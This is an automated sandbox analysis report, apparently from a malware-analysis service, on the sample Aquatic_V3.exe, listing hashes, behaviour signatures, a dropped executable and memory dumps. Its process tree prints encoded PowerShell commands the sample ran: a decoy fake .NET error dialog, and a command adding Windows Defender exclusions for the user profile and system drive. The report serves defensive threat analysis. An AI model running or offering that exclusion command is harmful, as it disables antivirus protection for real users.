9ef2be22125e81f24389ac7f338187b883fe9c279d72ed6cbe9b2c007c2cd6ed

General

Target

Aquatic_V3.exe
Size

2.8MB
MD5

99e3bd9d720cd5225a0a5bc68083bd8d
SHA1

7fdc97c76dcee5cbefd2a49425f1c161241047b8
SHA256

93a68ff2fad73f03cd57898d381641488800e6f3972a5fcff06426a498383b79
SHA512

6070c5445fb24c0a43faace255df0df6928d39af5e48d36bd6104a65147545902e051f70c859fb3e1b940c88745d856351811ae4b63b4fa65d95a12e8b9c5ac7
SSDEEP

49152:OVW97XtBjD7X5xbGNrWIxKiaDT6pxdObf+uRTlN4afnm16m+gmoZist:OV8tB7X5tGN6YKiw6pUf+uRTTOIduZiS

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2996	Winhlp64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3504	powershell.exe
896	powershell.exe
3504	powershell.exe
896	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 896	2316	Aquatic_V3.exe	79
PID 2316 wrote to memory of 896	2316	Aquatic_V3.exe	79
PID 2316 wrote to memory of 896	2316	Aquatic_V3.exe	79
PID 2316 wrote to memory of 3504	2316	Aquatic_V3.exe	81
PID 2316 wrote to memory of 3504	2316	Aquatic_V3.exe	81
PID 2316 wrote to memory of 3504	2316	Aquatic_V3.exe	81
PID 2316 wrote to memory of 2996	2316	Aquatic_V3.exe	83
PID 2316 wrote to memory of 2996	2316	Aquatic_V3.exe	83

C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe
"C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagB2ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAZAB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAgAHIAZQBxAHUAaQByAGUAcwAgAG8AbgBlACAAbwBmACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAHYAZQByAHMAaQBvAG4AcwAgAG8AZgAgAHQAaABlACAALgBOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrADoAIAB2ADEALgAxAC4ANAAzADIAMgAnACwAJwAnACwAJwBPAEsAJwAsACcAVwBhAHIAbgBpAG4AZwAnACkAPAAjAHoAcAB2ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAaABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABlACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3504
- C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe
  "C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe"
  2⤵
  - Executes dropped EXE
  PID:2996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d0c46cad6c0778401e21910bd6b56b70

SHA1
7be418951ea96326aca445b8dfe449b2bfa0dca6

SHA256
9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

SHA512
057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
32473e1ac3d512dd0491d2cf503c865c

SHA1
e72c41ad818ada929b99d3426a6879555cea1138

SHA256
32f21b17ebc78b126207b95fbd9d5156872032cd048614608a89b0215ce9a089

SHA512
95240dad4a09277294fbd72d3505a4431a1defc86028ee5ddab92cf17c9469c9915c72a07aac923fa6857175d0785eca0f54d62fdda7e7f5bb1afe31a583636e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe

Filesize
2.8MB

MD5
5193cb4946d8a5c0e4bcfa2589d2889f

SHA1
01da27ce3c3aaa705b9e8bc7bf29f4785dbb70a1

SHA256
d3c5034163ab5e7b5e6ff2bdb82a5e8c6f3e9adf0474a4e63311944fe1c53811

SHA512
d352234b6bf35aa942408eeb4e25dd6acf9081fd70b20cc48250dc8fd29e39a8baebc1c1d118e719ef66841e61144497e93b3f438b799e97eda098a7b866abaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qt1eevg1.2av.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/896-44-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download
memory/896-16-0x0000000073E30000-0x00000000745E1000-memory.dmp

Filesize
7.7MB

Download
memory/896-18-0x0000000002CB0000-0x0000000002CC0000-memory.dmp

Filesize
64KB

Download
memory/896-74-0x0000000073E30000-0x00000000745E1000-memory.dmp

Filesize
7.7MB

Download
memory/896-60-0x0000000007A20000-0x0000000007AB2000-memory.dmp

Filesize
584KB

Download
memory/896-21-0x0000000005690000-0x00000000056B2000-memory.dmp

Filesize
136KB

Download
memory/896-23-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/896-59-0x0000000008A30000-0x0000000008FD6000-memory.dmp

Filesize
5.6MB

Download
memory/896-15-0x0000000005820000-0x0000000005E4A000-memory.dmp

Filesize
6.2MB

Download
memory/896-17-0x0000000002CB0000-0x0000000002CC0000-memory.dmp

Filesize
64KB

Download
memory/896-47-0x0000000006B70000-0x0000000006B8A000-memory.dmp

Filesize
104KB

Download
memory/3504-57-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download
memory/3504-61-0x0000000007160000-0x000000000716A000-memory.dmp

Filesize
40KB

Download
memory/3504-45-0x000000007F160000-0x000000007F170000-memory.dmp

Filesize
64KB

Download
memory/3504-42-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

Filesize
304KB

Download
memory/3504-43-0x0000000006370000-0x00000000063A4000-memory.dmp

Filesize
208KB

Download
memory/3504-41-0x0000000005D80000-0x0000000005D9E000-memory.dmp

Filesize
120KB

Download
memory/3504-24-0x00000000058F0000-0x0000000005C47000-memory.dmp

Filesize
3.3MB

Download
memory/3504-56-0x0000000006350000-0x000000000636E000-memory.dmp

Filesize
120KB

Download
memory/3504-58-0x0000000006D70000-0x0000000006E14000-memory.dmp

Filesize
656KB

Download
memory/3504-22-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/3504-20-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download
memory/3504-46-0x0000000071430000-0x000000007147C000-memory.dmp

Filesize
304KB

Download
memory/3504-62-0x0000000007360000-0x00000000073F6000-memory.dmp

Filesize
600KB

Download
memory/3504-63-0x00000000072E0000-0x00000000072F1000-memory.dmp

Filesize
68KB

Download
memory/3504-64-0x0000000007320000-0x000000000732E000-memory.dmp

Filesize
56KB

Download
memory/3504-65-0x0000000007330000-0x0000000007345000-memory.dmp

Filesize
84KB

Download
memory/3504-66-0x0000000007420000-0x000000000743A000-memory.dmp

Filesize
104KB

Download
memory/3504-67-0x0000000007410000-0x0000000007418000-memory.dmp

Filesize
32KB

Download
memory/3504-70-0x0000000073E30000-0x00000000745E1000-memory.dmp

Filesize
7.7MB

Download
memory/3504-14-0x0000000073E30000-0x00000000745E1000-memory.dmp

Filesize
7.7MB

Download
memory/3504-13-0x00000000028C0000-0x00000000028F6000-memory.dmp

Filesize
216KB

Download
memory/3504-19-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing